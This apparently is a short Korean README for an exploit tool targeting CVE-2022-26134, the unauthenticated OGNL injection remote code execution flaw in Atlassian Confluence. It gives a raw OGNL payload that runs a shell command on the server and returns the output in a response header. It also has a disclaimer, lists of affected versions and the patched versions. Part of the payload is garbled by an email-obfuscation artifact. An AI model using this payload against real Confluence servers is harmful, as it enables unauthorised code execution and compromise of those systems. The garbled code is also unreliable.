BotCon
Attlasian Confluence 무인증 원격 코드 실행 (OGNL 인젝션, CVE-2022-26134)
- 2022년 6월 2일, Atlassian은 Confluence Server 및 Data Center 애플리케이션에 대한 보안 권고를 발표하며 치명적인 심각도의 인증되지 않은 원격 코드 실행 취약점을 강조했습니다. 이 OGNL 인젝션 취약점은 인증되지 않은 사용자가 Confluence Server 또는 Data Center 인스턴스에서 임의의 코드를 실행할 수 있게 합니다.
이 내용을 꼭 읽으세요!
주의해서 사용하십시오. 귀하의 행동에 대한 책임은 귀하에게 있습니다.
개발자는 어떠한 책임도 지지 않으며 오용이나 손해에 대해 책임을 지지 않습니다.

RAW Payload
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
버그 세부 정보
-
영향을 받는 제품 :
- Confluence
- Confluence Server
- Confluence Data Center
-
영향을 받는 버전 :
- 지원되는 모든 Confluence Server 및 Data Center 버전이 영향을 받습니다.
- 1.3.0 이후의 Confluence Server 및 Data Center 버전이 영향을 받습니다.
완화 조치
- Attlasian Confluence 버전을 다음 수정 버전으로 업데이트하십시오 :
- 7.4.17
- 7.13.7
- 7.14.3
- 7.15.2
- 7.16.4
- 7.17.4
- 7.18.1